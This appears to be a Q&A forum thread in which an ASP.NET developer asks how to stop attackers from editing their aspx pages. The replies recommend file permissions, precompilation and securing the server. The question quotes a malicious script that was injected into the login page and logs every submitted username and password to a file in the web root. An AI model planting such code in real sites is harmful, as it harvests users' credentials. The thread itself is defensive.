# How to not allow editing of the web page aspx?

Tags: c#, asp.net

Yesterday my web application has been changed by a virus, who edited the login page. When I opened the aspx file I came across the following script:

```
<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
   using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
   {
      file.WriteLine(username.Text + "|" + password.Text);
   }
}
</script>
```

Does anyone know how to not allow this?...

Comment: You can make a the files read-only and/or remove access to all except your app's service account it uses to run the site.

Comment: Whoever did this has access to your hosting server. Make sure you change all of your password and resecure your server.

Answer (score 1):

Best practice is to Precompile your views and code behind files on production environment.

http://msdn.microsoft.com/en-us/library/vstudio/bb398860(v=vs.100).aspx

Answer (score 1):

Anyone who can modify the `aspx` pages can also replace the assemblies in your `bin` folder.  The correct thing to do is to secure the web server.

Comment: He asked how. I guess he knows he has to.